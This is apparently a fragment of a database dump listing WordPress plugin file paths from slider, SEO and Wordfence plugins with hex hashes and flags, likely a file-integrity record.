(0xa0d9ecdd2838477bf35c5045d9ba3a16, 'wp-content/plugins/seo-ultimate/seo-ultimate.php', 1, 0x00000000000000000000000000000000, 0x3746663cd919a4e47f561867d852e3a5),
(0x74c7765d46e1a57e2b56dd6143230ba7, 'wp-content/plugins/seo-ultimate/translations/seo-ultimate-it_IT.mo', 1, 0x00000000000000000000000000000000, 0x06de7e7cee38e3df2b2ae1f2d1bc5649),
(0xc956d955995c15320412a5f804bf20d1, 'wp-content/plugins/seo-ultimate/translations/seo-ultimate-it_IT.po', 1, 0x00000000000000000000000000000000, 0xa72ac4e6777e5a6b41a6dcda976e4785),
(0x0bd1e9e5ee537164081bf29afb57d8d9, 'wp-content/plugins/seo-ultimate/translations/seo-ultimate.pot', 1, 0x00000000000000000000000000000000, 0x0884911e9e89929a7165b9654c7f9268),
(0x50fe40bfd0a9f57e9ee63e2ef58bf531, 'wp-content/plugins/slideshow-manager/coin-slider/coin-slider-styles.css', 1, 0x00000000000000000000000000000000, 0x4efc6696d5417f30f1da4cd168a059d6),
(0xc97d30cc3e5f402cb6aa94f91b5125f7, 'wp-content/plugins/slideshow-manager/coin-slider/coin-slider.min.js', 1, 0x00000000000000000000000000000000, 0x4baa9be1365889338d2902ef8faabb23),
(0x78adf0b64f611eea53d3674fc946f74a, 'wp-content/plugins/slideshow-manager/coin-slider/nav.png', 1, 0x00000000000000000000000000000000, 0x1459cbb8399019e9c2e563d917a8ceac),
(0xaba0f4f554f5426b030f8d1582640aa7, 'wp-content/plugins/slideshow-manager/icon.png', 1, 0x00000000000000000000000000000000, 0x6d5182f6425becd09dd909f1581c94f5),
(0x093178bc2ca3c6ce5ab7aedf3fb37f8c, 'wp-content/plugins/slideshow-manager/localization/slideshow-et.mo', 1, 0x00000000000000000000000000000000, 0x938128d412573f0337bb4dc4e75841cc),
(0x25d3d5a38c33d91ec8c0383e8b9d9760, 'wp-content/plugins/slideshow-manager/localization/slideshow-et.po', 1, 0x00000000000000000000000000000000, 0xe07d2e9570d598a9f61ea12b4f946d92),
(0xbec6a7e95a5cb5598a372eeba81b2483, 'wp-content/plugins/slideshow-manager/readme.txt', 1, 0x00000000000000000000000000000000, 0xe9a5679b4f666837281f7912869012ec),
(0x4058f6c5e53daa4b9a846455fcd96f18, 'wp-content/plugins/slideshow-manager/screenshot-1.jpg', 1, 0x00000000000000000000000000000000, 0x393660810f0d7089d5b734351cf2ac8f),
(0xc8a09346871c924235de02ed6121439b, 'wp-content/plugins/slideshow-manager/screenshot-2.jpg', 1, 0x00000000000000000000000000000000, 0xc3a05d78afee991483cc21e7c5912052),
(0x68804664ec6014d6fa10f80f757b70c2, 'wp-content/plugins/slideshow-manager/slideshow.php', 1, 0x00000000000000000000000000000000, 0xa0dcf09e3918e68ecc4471a07048e772),
(0xd88dcf2ca1476b65fe1753f848944db6, 'wp-content/plugins/total-slider/COPYING.txt', 1, 0x00000000000000000000000000000000, 0xb234ee4d69f5fce4486a80fdaf4a4263),
(0x2fbecd172eb0ed3bafb680a101076a54, 'wp-content/plugins/total-slider/admin/index.php', 1, 0x00000000000000000000000000000000, 0x7e52e216219c790b480e35dc57da815c),
(0x63a6aa38e0bd854d0b1e63a2ea6fbc20, 'wp-content/plugins/total-slider/admin/metaboxes/credits.php', 1, 0x00000000000000000000000000000000, 0xa6fcb24991a46c9adb5d68afd569c006),
(0xd75990da9659fc9073bad204935c3a6a, 'wp-content/plugins/total-slider/admin/metaboxes/index.php', 1, 0x00000000000000000000000000000000, 0x42d01ba711f3ef0f48614be49bcb8136),
(0xb6e540d316cd16e3165299f408df17a8, 'wp-content/plugins/total-slider/admin/metaboxes/slide-editor.php', 1, 0x00000000000000000000000000000000, 0xb703783df7982709d010aa0dd436ef4e),
(0xeb91b2e024c46f59cd00e1507419b447, 'wp-content/plugins/total-slider/admin/metaboxes/slide-preview.php', 1, 0x00000000000000000000000000000000, 0x5d4929dad31124e4c5276841a87cdad5),
(0x2c39c105494dd91d7ac9cb0f225459d7, 'wp-content/plugins/total-slider/admin/metaboxes/slide-sorter.php', 1, 0x00000000000000000000000000000000, 0xc8466f3890e4d022f2fec4628272c6dc),
(0x06444104b5cdb7c918c7dad95c7a4fac, 'wp-content/plugins/total-slider/admin/settings.php', 1, 0x00000000000000000000000000000000, 0x70232030f03369d02cb79b20804fc826),
(0xbd38e8a99563317b17ed91ac32b0ab5a, 'wp-content/plugins/total-slider/admin/slide-groups.php', 1, 0x00000000000000000000000000000000, 0x42a55a2481c11ab12fc766f313fabe64),
(0x8c1c7e753904c1149a4afb62796c7c96, 'wp-content/plugins/total-slider/admin/slides.php', 1, 0x00000000000000000000000000000000, 0x58e8ce07eedb132ca0b1b694af0b079d),
(0x05a05f8aa21bef5af27bbfa82deff612, 'wp-content/plugins/total-slider/admin/support/admin-css.php', 1, 0x00000000000000000000000000000000, 0x47007f55d9b19d57833b9983c6b7a7b8),
(0xa096053b311ccd83a7bf87144deb7bfe, 'wp-content/plugins/total-slider/admin/support/help-pointer-js.php', 1, 0x00000000000000000000000000000000, 0x3d1e512ad0d946d115bc6853af3de980),
(0x889506f7190bdfd9b261d3e83424be86, 'wp-content/plugins/total-slider/admin/support/help.php', 1, 0x00000000000000000000000000000000, 0xa78ac2934cb7cd55c54c1b9d15f8cdd1),
(0xd4e26030936b3c98625fc9787050b36d, 'wp-content/plugins/total-slider/admin/support/index.php', 1, 0x00000000000000000000000000000000, 0x42d01ba711f3ef0f48614be49bcb8136),
(0x98993a69357c389a1adad54d288b730c, 'wp-content/plugins/total-slider/admin/support/js-admin-page-reference.php', 1, 0x00000000000000000000000000000000, 0x6fba9d26bc715129b1516556ccebc8bf),
(0x57d519275d99abf38798ca9e2591d221, 'wp-content/plugins/total-slider/admin/support/uploader-javascript.php', 1, 0x00000000000000000000000000000000, 0xdb3efbbe926f58604e47e81e23095653),
(0x43c365869b7c4dc1d6bd9bad79db273c, 'wp-content/plugins/total-slider/css/interface.css', 1, 0x00000000000000000000000000000000, 0x36213fe4418cdb2f5ef2615a4a1b2691),
(0x9caaa73521cc6055a2e582e13740db43, 'wp-content/plugins/total-slider/img/icons.png', 1, 0x00000000000000000000000000000000, 0x5d207e53f0db65dc7063903d7c8a58d8),
(0xf545362d722f28397daf37008ec10bd0, 'wp-content/plugins/total-slider/img/loadingAnimation.gif', 1, 0x00000000000000000000000000000000, 0xc33734a1bf58bec328ffa27872e96ae1),
(0xc275b57b693059b5b7d3ef5467e42382, 'wp-content/plugins/total-slider/img/slider-desc-bg.png', 1, 0x00000000000000000000000000000000, 0x63c47790dbacccbb4b2adf99985c4eaf),
(0x679b21c20bd6a12fb642a9bc3e51df55, 'wp-content/plugins/total-slider/img/slider-icon-switch.png', 1, 0x00000000000000000000000000000000, 0x6c7e21dcec0b24cfaef56f5f01ab2f97),
(0x38d3d75b0d7a49f7e002d91a3235eef8, 'wp-content/plugins/total-slider/img/slider-workspace-bg.png', 1, 0x00000000000000000000000000000000, 0xd5312603942e3d5fec6c3291db59b2bd),
(0x55a4f4344025e35079d93796aaf83560, 'wp-content/plugins/total-slider/img/total-slider-icon-16.png', 1, 0x00000000000000000000000000000000, 0xb0ad06ed7ca65dc7b51c60f278292e1b),
(0x1d2ca82d09452167b3ab216b3d932806, 'wp-content/plugins/total-slider/img/total-slider-icon-32.png', 1, 0x00000000000000000000000000000000, 0x35a1d487a4ec6ef57a4f4620d93a9fe9),
(0x9cae0365538c47dbcbd282176c59fca8, 'wp-content/plugins/total-slider/img/vpm.png', 1, 0x00000000000000000000000000000000, 0xd7ab1ddbf0039b6ead5158f172264ce5),
(0x73eb6618e07d0e6180852b45e9ce8729, 'wp-content/plugins/total-slider/includes/ajax_interface.php', 1, 0x00000000000000000000000000000000, 0xe32c50bdd3012f9a49acab7050f93333),
(0x1660bc304a7dfc52b53bfb3b51855216, 'wp-content/plugins/total-slider/includes/class.slide-groups-table.php', 1, 0x00000000000000000000000000000000, 0x7a1d3a679974faf666a0883cac3a6802),
(0x3d5edfdb38cae0df3c34ad6c8727f211, 'wp-content/plugins/total-slider/includes/class.total-slide-group.php', 1, 0x00000000000000000000000000000000, 0xfc2852e44ea31716dabdd12549d21304),
(0x3fc4c123ac8a2121290163e06e1504e8, 'wp-content/plugins/total-slider/includes/class.total-slider-template.php', 1, 0x00000000000000000000000000000000, 0x4166d237b536d0f3f44c4a7cde3f2f2a),
(0x189463aaa81d8581111a20561115f3dd, 'wp-content/plugins/total-slider/includes/class.total-slider-widget.php', 1, 0x00000000000000000000000000000000, 0x0f2fb40ed3790a8ccf2d39d99a4c17a6),
(0xbc4fde88e5967d7cdd8b1c5b5d79b7c3, 'wp-content/plugins/total-slider/includes/index.php', 1, 0x00000000000000000000000000000000, 0xad30339627701817ea484ecff1ecefb0),
(0x4ea6a295bedaa69aaff0cb01878ce25a, 'wp-content/plugins/total-slider/includes/upgrade/index.php', 1, 0x00000000000000000000000000000000, 0x92e96ee4b2fe222cd2180a143639e8e0),
(0xa4476eb21319628be2101fe844c492d5, 'wp-content/plugins/total-slider/includes/upgrade/v1.0.x-to-v1.1.php', 1, 0x00000000000000000000000000000000, 0x8037cdd61186f71b43babbda726556d4),
(0xf9881868c64c9c8209a61f654d431b7e, 'wp-content/plugins/total-slider/index.php', 1, 0x00000000000000000000000000000000, 0xad30339627701817ea484ecff1ecefb0),
(0x0cb55f7406c299ae4fefe24a783c3d8c, 'wp-content/plugins/total-slider/js/ejs.js', 1, 0x00000000000000000000000000000000, 0x9d0c25ccdb343f95504d39af0d8b5a3d),
(0x262546ac5a48f12f9556095ca909f7dd, 'wp-content/plugins/total-slider/js/ejs.min.js', 1, 0x00000000000000000000000000000000, 0xe3ef64134f29620ff0b9670b2d6a6570),
(0xd2481d7ef209449a4dc13216470d82ba, 'wp-content/plugins/total-slider/js/interface.js', 1, 0x00000000000000000000000000000000, 0x0c319bca74205b7894f2893e902905a8),
(0x20e0cfc1407205c07d32b857007c3170, 'wp-content/plugins/total-slider/js/interface.min.js', 1, 0x00000000000000000000000000000000, 0xabc2e2c0800405b61f286009c4fb20ca),
(0x6fdf2227e8056fb917bdf76f20dc1009, 'wp-content/plugins/total-slider/js/jquery.cycle.lite.js', 1, 0x00000000000000000000000000000000, 0xa2bd03aae18c975833cd7aa961c14fb0),
(0xdd8fb0d2f1368a8e44cfcc94056fb676, 'wp-content/plugins/total-slider/js/jquery.cycle.lite.min.js', 1, 0x00000000000000000000000000000000, 0xa61be4798d5d1d8002f21dfa6ac74d4e),
(0x098e481702ab4f4282d255f4d43242b3, 'wp-content/plugins/total-slider/languages/total_slider-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0x5c79644f2c568a60e607f2078d37ce9c),
(0x4f7a5f9f43d34f815d62d744b203a9e9, 'wp-content/plugins/total-slider/languages/total_slider-fr_FR.po', 1, 0x00000000000000000000000000000000, 0x9685d25881ca912d9d6279a8877571a8),
(0x58159175bd0738d477775975614b978d, 'wp-content/plugins/total-slider/languages/total_slider.pot', 1, 0x00000000000000000000000000000000, 0x8e89f0a168227379a1d64cabd0e04aa5),
(0xe1f6e2170bf7e6bddb5cf9ac5840f1e2, 'wp-content/plugins/total-slider/license.txt', 1, 0x00000000000000000000000000000000, 0xffa10f40b98be2c2bc9608f56827ed23),
(0x99ab2acb8c74414b74b1867225a9fff1, 'wp-content/plugins/total-slider/readme.txt', 1, 0x00000000000000000000000000000000, 0xd447de454f6822d3903b756e2c591256),
(0xe8746d74863f7b5e9f973bb379029c2c, 'wp-content/plugins/total-slider/templates/default/default.js', 1, 0x00000000000000000000000000000000, 0x77a1bc888a9b8eae6b9bf34f8510d529),
(0xab118cab899946f1a0cc0507200c7f8c, 'wp-content/plugins/total-slider/templates/default/default.min.js', 1, 0x00000000000000000000000000000000, 0x02187753a98aedb51f1f068fc4686a1a),
(0xcb57a9b01166efbabca7cadcb4e549b2, 'wp-content/plugins/total-slider/templates/default/default.php', 1, 0x00000000000000000000000000000000, 0xc35b7ff8a3f14eb89f56a5ea4e1fece9),
(0x4713c00216bfd628833f34c1748c8f6b, 'wp-content/plugins/total-slider/templates/default/img/slider-desc-bg.png', 1, 0x00000000000000000000000000000000, 0x63c47790dbacccbb4b2adf99985c4eaf),
(0xbadcedd0ac9e3bf9ba5f857e7aebbb53, 'wp-content/plugins/total-slider/templates/default/index.php', 1, 0x00000000000000000000000000000000, 0x6b0a8d6d31e7cdd65465790ce7d64444),
(0xe7df19360ccb82aeb3f219dd0aaba5b6, 'wp-content/plugins/total-slider/templates/default/style.css', 1, 0x00000000000000000000000000000000, 0xad19c931bfeb18cfe92b95b91ede3de2),
(0x14f9b22099340ca523b736daeb0056df, 'wp-content/plugins/total-slider/templates/index.php', 1, 0x00000000000000000000000000000000, 0x6b0a8d6d31e7cdd65465790ce7d64444),
(0xa83f142b0883b13fb0fc7cc0b62ffcc0, 'wp-content/plugins/total-slider/templates/twentytwelve/index.php', 1, 0x00000000000000000000000000000000, 0x38672fb26228080aaffb73586b4dbaf6),
(0x5fc20e22e96eccab60f86122b2d0302f, 'wp-content/plugins/total-slider/templates/twentytwelve/style.css', 1, 0x00000000000000000000000000000000, 0x413c2c811ec9f3a33931ae0373709048),
(0x2c4064725d623ada8cfb94532a846101, 'wp-content/plugins/total-slider/templates/twentytwelve/twentytwelve.js', 1, 0x00000000000000000000000000000000, 0xc36ca8dd6f5f22b24215836599e6ed9b),
(0x2e425e6cb4cb25b4d3e0c26a18cfd280, 'wp-content/plugins/total-slider/templates/twentytwelve/twentytwelve.min.js', 1, 0x00000000000000000000000000000000, 0x6310d403e6cd5294b6e608571aafdaee),
(0x4516e4e96cb673f3d88fcf82ca739123, 'wp-content/plugins/total-slider/templates/twentytwelve/twentytwelve.php', 1, 0x00000000000000000000000000000000, 0xbb01ab74202d5755b9133e8cd44bb654),
(0x09592aeb50ce2d98978ab99d7f392f41, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/index.php', 1, 0x00000000000000000000000000000000, 0x38672fb26228080aaffb73586b4dbaf6),
(0x41fb926032b30780ee95b21897587296, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/style.css', 1, 0x00000000000000000000000000000000, 0xa89e72893cee159cc0d85e7487b77579),
(0x60e5b25ba076a30fa5b8cba09b3919e2, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/twentytwelve-alt.js', 1, 0x00000000000000000000000000000000, 0xd065e464fc0b532d5f4b326d1630bd78),
(0x01ab659584646cd5f79d7b55030fd9ed, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/twentytwelve-alt.min.js', 1, 0x00000000000000000000000000000000, 0x6e01442ec70abc75e70b6fabb22d25af),
(0x863c5d05724f43656f3279ab6ec80a52, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/twentytwelve-alt.php', 1, 0x00000000000000000000000000000000, 0xa62aa8bbbc6d02b566052e78cd43fd3a),
(0x8243bd2c87a7875338a2a1d42f683d4f, 'wp-content/plugins/total-slider/tinymce-custom/mce/total_slider_insert/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0xc779df7864d82876034bb9a184ba5e62),
(0xd96c8527da8807e0a097d48d6f9bb207, 'wp-content/plugins/total-slider/tinymce-custom/mce/total_slider_insert/slider_insert.html', 1, 0x00000000000000000000000000000000, 0x4b3e7b8953e4383b4b2726248cd0e51f),
(0x44dd7a221064430c18b7735bee3763b4, 'wp-content/plugins/total-slider/tinymce-custom/mce/total_slider_insert/slider_insert_fr_FR.html', 1, 0x00000000000000000000000000000000, 0x89d5baa4861c53fa70c081f47c770915),
(0xf6d18485b9c68c99780f154a1fbee7ed, 'wp-content/plugins/total-slider/tinymce-custom/mce/total_slider_insert/total-slider-mce-icon.png', 1, 0x00000000000000000000000000000000, 0xd40c6bb269a57edd4a626b1c908f6fd9),
(0x49f6842663b5cd7dfa1d60602bdc4304, 'wp-content/plugins/total-slider/total-slider.php', 1, 0x00000000000000000000000000000000, 0x7dc2e1540f13c4f470653c77aa7dacc3),
(0x2275e2a8b3c80900211c239988c6d717, 'wp-content/plugins/widgets-on-pages/readme.txt', 0, 0x7cee406842ab76bf57d9aed509b16163, 0x7cee406842ab76bf57d9aed509b16163),
(0x0e472dbdfeeef578d8fb29f45425db08, 'wp-content/plugins/widgets-on-pages/screenshot-1.png', 1, 0x00000000000000000000000000000000, 0x734a8e52917214cc6ea5d7019d97247f),
(0x97087e68cdc9543452fbd4a8dc6b7acc, 'wp-content/plugins/widgets-on-pages/screenshot-2.png', 1, 0x00000000000000000000000000000000, 0x6ef4ac149cb7361a9aaa7b12a09a13c0),
(0x28265fe90104122c7a97cd2c25557cce, 'wp-content/plugins/widgets-on-pages/widgets_on_pages.php', 1, 0x00000000000000000000000000000000, 0x33b4776d562cf2ed6d644d58d10a0731),
(0x9237642647371a6203ff33c094975d3d, 'wp-content/plugins/widgets-on-pages/wop.css', 1, 0x00000000000000000000000000000000, 0x0d43925617714c08dea41c332a9af8da),
(0xde3c11c60bdfe538364b6f0c02858c58, 'wp-content/plugins/wordfence/css/activity-report-widget.css', 1, 0x00000000000000000000000000000000, 0xee20ba3b95cda6690dd86ecbe198222a),
(0xfd214041823b311029534a97c862b7cc, 'wp-content/plugins/wordfence/css/colorbox.css', 1, 0x00000000000000000000000000000000, 0x90f2d800672faf133442452db8e7ffd1),
(0xfcd5c5b7154e0900f9db661a54b21b8a, 'wp-content/plugins/wordfence/css/diff.css', 1, 0x00000000000000000000000000000000, 0xe422a88993f4d5791c3185f79d345ac6),
(0x61e57c0a82fc7c40580ab69c664d0da7, 'wp-content/plugins/wordfence/css/dt_table.css', 1, 0x00000000000000000000000000000000, 0xa25b14a166fee61a99aa047dc1492b6f),
(0xbb9c355ab491fffccc6f06978ed2ae3c, 'wp-content/plugins/wordfence/css/fullLog.css', 1, 0x00000000000000000000000000000000, 0x2bb719ddf2f257896a0577cb847d9ae4),
(0x07156aabe66fa42b88b173db37db381c, 'wp-content/plugins/wordfence/css/iptraf.css', 1, 0x00000000000000000000000000000000, 0x2b0913ce12e6eb1d3cbc647185375eb3),
(0x6fd0e561c8e6773568de402b770d1ebc, 'wp-content/plugins/wordfence/css/main.css', 1, 0x00000000000000000000000000000000, 0x07b98178c0b69f4a18e4e8838f83b55d),
(0xbafce6867305e15958cd0c9aace39e97, 'wp-content/plugins/wordfence/css/phpinfo.css', 1, 0x00000000000000000000000000000000, 0xa33c60cc2c37917fdc4a06037500139f),
(0xe6a798baee37dd5ef4bb1362b30822b3, 'wp-content/plugins/wordfence/images/back_disabled.jpg', 1, 0x00000000000000000000000000000000, 0x68d901c2d467d8faef69eee30406863e),
(0xebc8c4d7ae46eeea70de73a5d834a311, 'wp-content/plugins/wordfence/images/back_enabled.jpg', 1, 0x00000000000000000000000000000000, 0xa1a1f1f85d07c8f77fa394d248038ec3),
(0x5e79473dda9c4667073b330591c3a1a9, 'wp-content/plugins/wordfence/images/button-grad-grey.png', 1, 0x00000000000000000000000000000000, 0x95c45243ec1d1cbfca547908d5fd3fde),
(0x2ea645c71d5b4af5cf6c039e781ddfe3, 'wp-content/plugins/wordfence/images/forward_disabled.jpg', 1, 0x00000000000000000000000000000000, 0x4d5fdad65a3fda4e29bad28aea3adc35),
(0x98006814ee94114b669511018d00f0f8, 'wp-content/plugins/wordfence/images/forward_enabled.jpg', 1, 0x00000000000000000000000000000000, 0x55002f336534651399cfd70b8308def6),
(0x15fbf7dee7aa92b775a3a10d5a4a572b, 'wp-content/plugins/wordfence/images/help.png', 1, 0x00000000000000000000000000000000, 0x244ec7fc3b27fd874dcfcff9f2205901),
(0xd998dd2250b4dc9ef7c62c83171ca9d8, 'wp-content/plugins/wordfence/images/icons/ajax24.gif', 1, 0x00000000000000000000000000000000, 0x4b3afb84b2b71ef56df09997a350bd04),
(0x278b16fcbb9e20986fc8138dcd539d8a, 'wp-content/plugins/wordfence/images/icons/ajax3.gif', 1, 0x00000000000000000000000000000000, 0x6d1877dfdfb474ea8d93270aa4f1ed73),
(0xa1ea79ee1326619241a037c25d0e446d, 'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif', 1, 0x00000000000000000000000000000000, 0xb4cfe025babba9420a670fa03285893b),
(0xbb06d202c934fe991cf589f93d8eb811, 'wp-content/plugins/wordfence/images/icons/ajaxScan.gif', 1, 0x00000000000000000000000000000000, 0x91ca96b4d1b4adf77e66fa0efa9e69c1),
(0x6a26ba563199acae36139334aaafebe2, 'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif', 1, 0x00000000000000000000000000000000, 0xbe1cede97289c13920048f238fd37b85),
(0x28782a4aa0fb852c854cc39b6ee73c4b, 'wp-content/plugins/wordfence/images/icons/arrow_refresh.png', 1, 0x00000000000000000000000000000000, 0x6b95778460f660aa7c08f47d244780a7),
(0x365b66c039b83f869307171812205fc7, 'wp-content/plugins/wordfence/images/icons/bullet_yellow.png', 1, 0x00000000000000000000000000000000, 0x4a26fbded3c98c8afd0feceed494513c),
(0x5da5a4ca2a85a48f0c85ff038f4a0b96, 'wp-content/plugins/wordfence/images/icons/email_go.png', 1, 0x00000000000000000000000000000000, 0xbaaa6accd945fcb4480b29ab2e15bded),
(0xa0b88b08876025fa927bcdfcd22b9bf3, 'wp-content/plugins/wordfence/images/icons/error128.png', 1, 0x00000000000000000000000000000000, 0xc93ade152513130e37f721c1b4042ed1),
(0x7aa235b72a1a41445a436bace16aae92, 'wp-content/plugins/wordfence/images/icons/magnifier.png', 1, 0x00000000000000000000000000000000, 0xa81fa78d754fae7b3a71026356e3ee27),
(0xafcea17ed7df93fe3afde8e0c2f8656f, 'wp-content/plugins/wordfence/images/icons/tick128.png', 1, 0x00000000000000000000000000000000, 0xe5c49f8bf86319b7680b3422e8dd10ab),
(0xff3b0860ba2472e79fcbd124b39ea63d, 'wp-content/plugins/wordfence/images/icons/warning128.png', 1, 0x00000000000000000000000000000000, 0x70cf47c01949d7742af693c6ca4e703d),
(0xaa58e0e1401bc1d425bd310c4384c169, 'wp-content/plugins/wordfence/images/lightbox-controls.png', 1, 0x00000000000000000000000000000000, 0x9d6d135dbc6192ac0e955c24c9048f1f),
(0x83a83f08e70eacda7a36a497db61447a, 'wp-content/plugins/wordfence/images/loading.gif', 1, 0x00000000000000000000000000000000, 0x4b3afb84b2b71ef56df09997a350bd04),
(0xfd4b056af21818e2aa160b68ba91e8f9, 'wp-content/plugins/wordfence/images/loading_background.png', 1, 0x00000000000000000000000000000000, 0xacf427e932fb9413700a4b8b58b41eec),
(0xe8f287f251cb6fb5482a04b982c028ef, 'wp-content/plugins/wordfence/images/sort_asc.gif', 1, 0x00000000000000000000000000000000, 0x2cb8bb49a7c52bc6bea0eafa7f3d80fc),
(0xc96c589477c1f3014207f52a58a757f1, 'wp-content/plugins/wordfence/images/sort_asc_disabled.gif', 1, 0x00000000000000000000000000000000, 0x4f7fc9a7c5fecd2ad25812ffb2db3965),
(0x3f59768e71015fea7f97ffb3dbae584f, 'wp-content/plugins/wordfence/images/sort_both.gif', 1, 0x00000000000000000000000000000000, 0xc5e1250cd942ac511678c153562e1044),
(0x37c063f72e0c245021d7228cf2b99a86, 'wp-content/plugins/wordfence/images/sort_desc.gif', 1, 0x00000000000000000000000000000000, 0xa93c84aed56aff8c5fb3cb8a04529d32),
(0x787997210ee0f8f471c129f62ecb8922, 'wp-content/plugins/wordfence/images/sort_desc_disabled.gif', 1, 0x00000000000000000000000000000000, 0xce6d8e848695cd9fca08e472d1d62039),
(0x3a6d77764b0dff9e9491825a898c7e7f, 'wp-content/plugins/wordfence/images/wordfence-logo-16x16.png', 1, 0x00000000000000000000000000000000, 0x9d1a79f018337a8a2052bcb3f8303948),
(0x460be00fe84fdba3a0ffd4ffe7eb6790, 'wp-content/plugins/wordfence/images/wordfence-logo-32x32.png', 1, 0x00000000000000000000000000000000, 0xa6b6fbe1d679a5778a125ac0e3253ffc),
(0x6adabfb474d8c13175a9ac867da3a7be, 'wp-content/plugins/wordfence/images/wordfence-logo-64x64.png', 1, 0x00000000000000000000000000000000, 0x061ed8075d2406d20c0b6264f92b4e59),
(0xa37a52b275bd9d0598f79f1defc1093b, 'wp-content/plugins/wordfence/images/wordfenceFalcon.png', 1, 0x00000000000000000000000000000000, 0x64276d5f0430f2785a1e622dd5eec425),
(0x3d98d33bd438914ed72e829245f333f8, 'wp-content/plugins/wordfence/images/wordfenceFalconEngineSmall.png', 1, 0x00000000000000000000000000000000, 0x96739f2aed66f026064037851e3d4a03),
(0x9c64f7975bfea819ff38c6f934a06b79, 'wp-content/plugins/wordfence/images/wordfenceFalconSmall.png', 1, 0x00000000000000000000000000000000, 0x3e9cca688f1e6a04b54bb877f37eba85),
(0x4584bb28fd7a5241313b654ec7714433, 'wp-content/plugins/wordfence/index.php', 1, 0x00000000000000000000000000000000, 0x32c101e865d8c2c2aaadeb5cc6c16f67),
(0xe9221206f0a2d35b125109d8c3c205f0, 'wp-content/plugins/wordfence/js/admin.js', 1, 0x00000000000000000000000000000000, 0x86e5b1c4d2b4df0159b2f128f062ee56),
(0x177710cb41c92f09a2fffebbc4895c71, 'wp-content/plugins/wordfence/js/jquery.colorbox-min.js', 1, 0x00000000000000000000000000000000, 0x343f4ac783b347fd60920ad64eca786c),
(0x99e1454e191830cf7fa116951cdc0c36, 'wp-content/plugins/wordfence/js/jquery.dataTables.min.js', 1, 0x00000000000000000000000000000000, 0x6147ccee7aef9dc0c6eb10d8d7b311f9),
(0x611ac8639f9db3fc7295321be404f4ac, 'wp-content/plugins/wordfence/js/jquery.tmpl.min.js', 1, 0x00000000000000000000000000000000, 0x805c7dc322a386178b37dab79295445a),
(0xb1fab395cb84987606efd82bb96e47d3, 'wp-content/plugins/wordfence/js/jquery.tools.min.js', 1, 0x00000000000000000000000000000000, 0xd13a0e2db7e10645d5a078a124e0b842),
(0xf9a9805869125531608eb25d8293eb93, 'wp-content/plugins/wordfence/js/perf.js', 1, 0x00000000000000000000000000000000, 0x7551f722ca7746f7dce11752141f4070),
(0x87da157992f82febf6647a83516794b5, 'wp-content/plugins/wordfence/js/tourTip.js', 1, 0x00000000000000000000000000000000, 0x5a2fded7b37df464fcb4c33146d99d0e),
(0x528eb51cfa313f99fb8859d3564474bb, 'wp-content/plugins/wordfence/lib/.htaccess', 1, 0x00000000000000000000000000000000, 0xb749a07a7ed269b62c1b4c9effe81e04),
(0x1c9fb827fa8f4645109f419676514d76, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php', 1, 0x00000000000000000000000000000000, 0x3e0db019c3355d78564919d6278c69b5),
(0x790c8aad813189e22de8862f6649d7a0, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php', 1, 0x00000000000000000000000000000000, 0x28a92f46498d32b9a74c5847f75c912e),
(0xeb2d6eea242eff230b0b6725c47dddf7, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php', 1, 0x00000000000000000000000000000000, 0x70b4fe80751551f884ac3a20cc04042a),
(0x60bb6330af089ed95cf9e2eb9533e68d, 'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php', 1, 0x00000000000000000000000000000000, 0x894fd22225c3a914be4fb2445ade046a),
(0xdb964a8f427785431198a17c7f4df476, 'wp-content/plugins/wordfence/lib/Diff.php', 1, 0x00000000000000000000000000000000, 0x527cd024b9c8ece7a9563b50e093e2d9),
(0xd3261129032dc3a2ab1a088dce999570, 'wp-content/plugins/wordfence/lib/GeoIP.dat', 1, 0x00000000000000000000000000000000, 0xae64717432abaae5545b915c262725f6),
(0xd6cf4a1dd8fbef21ac5b5736dda7e9fd, 'wp-content/plugins/wordfence/lib/IPTraf.php', 1, 0x00000000000000000000000000000000, 0x8ed07483d8512e71039dcf3de886ab81),
(0x80a917f25350d33b5ec6ad1c7a90df49, 'wp-content/plugins/wordfence/lib/conntest.php', 1, 0x00000000000000000000000000000000, 0xfbfc693f6a77d77aba12b8429ae356f1),
(0x83f766a04eca649aa9b48f814cfafe01, 'wp-content/plugins/wordfence/lib/cronview.php', 1, 0x00000000000000000000000000000000, 0x1fe107bc7ca6637b55848b013e280f76),
(0xbfbcadc7b7ae95acb58ffab50a8248b9, 'wp-content/plugins/wordfence/lib/dashboard.php', 1, 0x00000000000000000000000000000000, 0x2236e501369778717d72a39f5c793370),
(0xfbccc3f63652692a358ef0c1c414c3a6, 'wp-content/plugins/wordfence/lib/dbview.php', 1, 0x00000000000000000000000000000000, 0xa6c0ae281e449865838e64ab3aa15d18),
(0xcd29c4c503e4f2009f65875fd4353dab, 'wp-content/plugins/wordfence/lib/diffResult.php', 1, 0x00000000000000000000000000000000, 0x4959c10c855938865c40b73664277223),
(0x230a1cc1f42f86db505a177e6884cef8, 'wp-content/plugins/wordfence/lib/email_genericAlert.php', 1, 0x00000000000000000000000000000000, 0x761b265a38c05adb8c22ba6a73717c38),
(0x139bbba0c60fed4665b1093504375be9, 'wp-content/plugins/wordfence/lib/email_newIssues.php', 1, 0x00000000000000000000000000000000, 0xf829f263ff43bf884133d82ec78d83de),
(0xcce4a5742b8cbb894e2da8cc92b0881f, 'wp-content/plugins/wordfence/lib/email_passwdChanged.php', 1, 0x00000000000000000000000000000000, 0x0cda6cb3ac0c9a18001052ddc557c897),
(0x27bbe23fb768cf097dfa13590049470b, 'wp-content/plugins/wordfence/lib/email_pleaseChangePasswd.php', 1, 0x00000000000000000000000000000000, 0x16a6ca7abe28f214406001037df28b68),
(0xd7e45ecb75a9ade2cb7d9d47bbd41514, 'wp-content/plugins/wordfence/lib/email_unlockRequest.php', 1, 0x00000000000000000000000000000000, 0xb620da45db0632382e11363352baedb8),
